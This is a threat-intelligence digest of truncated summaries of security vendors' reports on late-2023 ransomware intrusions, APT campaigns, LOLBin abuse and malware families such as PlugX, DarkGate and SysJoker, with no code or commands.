eSentire’s TRU unit tracked a October 2023 LockBit ransomware intrusion linked to a Citrix Bleed CVE-2023-4966 exploit, including initial access via session token bypass and C2 activity tied to Brute Ratel and FileTransfer assets. The investigation details the…
Tag: EDR
PlugX is a covert malware linked to cyber espionage and targeted attacks, with a history of evasion and modular capabilities. Splunk Threat Research Team provides a deep dive into a PlugX variant, covering its side-loading, multi-layer payload decryption, and …
Attacks on a critical infrastructure target in South Africa, supply-chain attack on Linux machines, Telegram doppelganger used to target people in China.
Threat actors in the DB#JAMMER campaigns compromised exposed MSSQL databases via brute-force login attempts and deployed a full toolkit leading to ransomware and Cobalt Strike payloads. The operation progressed from initial access through enumeration, defense …
Genians Security Center observed a Korean-targeted APT campaign that delivers malicious OLE objects embedded in HWP documents to execute encrypted PowerShell payloads from the FlowerPower tool family. Attackers leverage GitHub as a covert command-and-control/h…
Threat actors repurpose native Windows tools (LOLBins) such as finger.exe to enable data ingress and exfiltration while blending in with legitimate activity. The Huntress report shows finger.exe used to download files to the endpoint, enumerate information, an…
Leveraging Ghidra to establish context and intent behind suspicious strings.
Check Point Research describes new SysJoker variants used in targeted attacks against Israeli organizations, highlighting a full rewrite in Rust and a shift from Google Drive to OneDrive for hosting encrypted C2 configuration. The report details persistence vi…
Qualys Threat Research uncovers Phobos ransomware masquerading as VX-Underground (VXUG), often distributed via stolen RDP and operating as a RaaS linked to Dharma/CrySIS. The article details anti-analysis checks, a wide process-kill routine, backup and firewal…
Microsoft Threat Intelligence uncovered a Diamond Sleet supply chain attack that tampered with a CyberLink installer to deliver a second-stage payload. The malicious file is signed with a valid CyberLink certificate, hosted on CyberLink infrastructure, and inc…
A NCC Group incident response study analyzes NoEscape ransomware techniques observed in a recent engagement, highlighting opportunistic access and noisy tool use. The findings cover ProxyShell exploit access to Exchange, RDP lateral movement with SSH tunneling…
DarkGate is a sophisticated Remote Access Trojan sold as Malware-as-a-Service by the actor RastaFarEye, evolving through multiple versions with advanced evasion and multi-stage loading chains. Trellix researchers document its deployment methods, feature set, a…
Unit 42 documents three Stately Taurus campaigns in August targeting South Pacific entities, including the Philippines government, using renamed Solid PDF Creator and a side-loaded DLL to maintain persistence and C2 activity. The actors also disguised C2 traff…
Securonix researchers describe an SEO poisoning/malvertising campaign dubbed SEO#LURKER that uses fake Google ads and lookalike sites to deliver a malicious WinSCP lure which sideloads DLLs and executes obfuscated Python payloads, resulting in C2 beaconing and…
ASEC reports attacks against vulnerable Apache web servers where threat actors deploy Cobalt Strike beacons and XMRig coin miners on Windows servers, often via PHP web shells and unpatched vulnerabilities. The operation uses obfuscated malware, staged beacons,…